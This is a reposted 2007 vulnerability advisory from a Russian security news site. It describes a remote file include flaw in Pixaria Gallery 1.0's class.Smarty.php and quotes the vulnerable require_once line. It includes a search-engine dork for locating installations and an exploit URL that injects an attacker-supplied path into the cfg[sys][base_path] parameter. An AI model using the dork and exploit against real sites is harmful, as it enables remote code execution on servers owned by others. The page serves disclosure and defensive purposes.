Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Sitebar 3.3.5 (index.php writerFile)Remote
File Include Vulnerabilities

  Back-End CMS Database Tables v0.4.7 Cross Site Scripting

  bloofoxCMS 0.2.2 Cross Site Scripting

  MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities

From:irvian <irvian_yoe_(at)_yahoo.com>
Date:16 апреля 2007 г.
Subject:Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability

Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability

---------------------------------------------------------------------------------
--------
# scripts       : Pixaria Gallery 1.0
# Discovered By : irvian
# scripts site  : http://pixaria.com/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          : powered by Pixaria™ Gallery
                 inurl:index.gallery.php?gid=
---------------------------------------------------------------------------------
---------
bug found:

/resources/includes/class.Smarty.php

// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[ev
ilcode]
        

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород